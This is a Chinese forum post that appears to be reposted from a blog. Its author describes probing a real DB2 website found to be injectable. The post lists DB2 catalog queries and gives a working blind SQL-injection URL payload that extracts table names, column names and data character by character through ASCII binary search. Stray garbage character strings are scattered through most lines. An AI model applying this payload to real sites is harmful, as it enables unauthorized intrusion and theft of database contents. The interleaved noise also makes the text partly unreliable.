使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。 % ~! p% u: |! W# ~% ?. U4 O
参考了IBM DB2的文档,总结了这样几条:
3 C* A/ L" x$ ?; _, o1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER
5 @' E& A0 `1 M4 z! G* w可以返回系统中所有用户创建的表(table)名 ' ?; q5 }$ T1 A" P
2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME='' # f: [/ ^* G+ m# a# p' f
返回表中的列名
, I; ~8 d! j- g, S8 E3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY
) H& @. P0 G. J f# i这是最关键的地方,返回第一条记录,类似于sql server中的top 1 2 e1 ?, P4 V3 s" T) l+ ?, k
4、SUBSTR(string, position, length)
, _) k8 j Z2 j* `7 b! y返回字符串子串的函数,类似于mid ) C% ]4 m* l' m4 \9 }, a. p u+ Q
5、ASCII()这个就不用多说了。
/ `: E, y6 z: m3 s0 D I有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。
( z& L: {8 P! e- j例如判断第一个table的名称的第一个字符的ascii码是否大于50:
* y% E7 m% m3 W* E4 K [http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
; h3 }7 ^4 _; h/ N7 _) M1 E: _; T4 M) B- U) P e% i. U5 p2 M: x
http://blog.waynedeng.com/blogview.asp?logID=543 7 x" m& N- ^- |# u6 Z, y, F" }
|
发表于 2012-9-15 14:06:51
收藏
支持
反对